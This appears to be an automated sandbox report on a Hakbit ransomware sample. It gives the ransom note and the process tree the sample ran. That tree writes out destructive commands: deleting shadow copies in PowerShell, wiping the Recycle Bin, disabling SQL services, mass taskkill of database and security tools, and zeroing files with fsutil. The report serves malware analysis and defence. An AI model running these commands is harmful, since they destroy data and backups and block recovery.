Analysis

  • max time kernel
    1788s
  • max time network
    1786s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: AurLkNjAgbjanuDB/60MzNmn2c/YqPxL1asGmTG80+NCkBjZ2vXLtGUaqQTTP4IPFTyMtTI85kPMGqZ/X2wFDQUfMrKg9pzhk6mXJw7UibHl+wzHclZTbOUc16lkPinb5sMOtFkvKTS73MC5d733N7iTAyBf/D9rfqIO4VqVd5YdAeNOMw/IRvn3ifZyNPWHYKDhT/1C86gRrumhYZJkF2sbHd3CM1dpUlMDWIMSs8K16e7A1Ra2tzfbjg8z305vg7X+4IwTBnu1Sbm5YstbWZBB3k7OOlLLCH/y5+kXRi+xIKzFPBflFwlg4MKqqNj/UO2s26NWfMeqouuF9mxV1MgEEGESP9btTLyX+1xJZLY/W+OF14R3JBbqbw7G2e8j8EPB0wTgYnTmejhJUAcSTJJ/AIQrqPpCk/XgHDxzITuUEgDivP8jGIFha42gO3tXAeAQ/2sfD/wuomlDT8UGSHIgoG7Cq3RrHJDL/8yzJQrXN/H4450nuoU1CgMTRaIFgqKIZb/FeIr9jIsi/0CK/MH+QDaRvLAr+2Dfkje7UcxAa02dHx1jXc7VOFqAKdghfecAok9OWsnUjnnStgY/cxzi9uHySdRkRO2WUYcIhpvMCIJLJec3OJD0x5ip0Z6d7gI+kg3vyp2iLyQ4/QpZdERb1+uoqU+aLPywnlPJDbw= Number of files that were processed is: 1274
Emails

potentialenergy@mail.ru

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Modifies extensions of user files ⋅ 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file ⋅ 1 IoCs
  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill ⋅ 47 IoCs
  • Opens file in notepad (likely ransom note) ⋅ 1 IoCs
  • Runs ping.exe ⋅ 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 48 IoCs
  • Suspicious use of FindShellTrayWindow ⋅ 1 IoCs
  • Suspicious use of SendNotifyMessage ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    Modifies extensions of user files
    Drops startup file
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      PID:3820
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      PID:2932
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID:1696
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      PID:3428
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      PID:2960
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:200
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1476
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3196
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1344
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2248
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2292
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2312
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3384
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3976
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2364
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2896
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3184
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3920
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2972
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4084
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1268
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4044
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4048
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      Kills process with taskkill
      PID:2104
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4116
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4196
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4240
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4260
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4300
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4348
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4384
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4428
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4504
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4548
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4600
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4632
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4692
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4756
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4784
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4868
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4936
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4964
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5004
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5076
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3428
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4256
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4268
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5584
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      Suspicious use of AdjustPrivilegeToken
      PID:5688
    • C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
      Opens file in notepad (likely ransom note)
      PID:5416
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      PID:5116
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.7 -n 3
        Runs ping.exe
        PID:4840
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        PID:4352
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
      PID:5004
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        PID:6328

Network

MITRE ATT&CK Matrix

  • Command and Control
  • Credential Access
  • Defense Evasion
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Persistence
  • Privilege Escalation


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt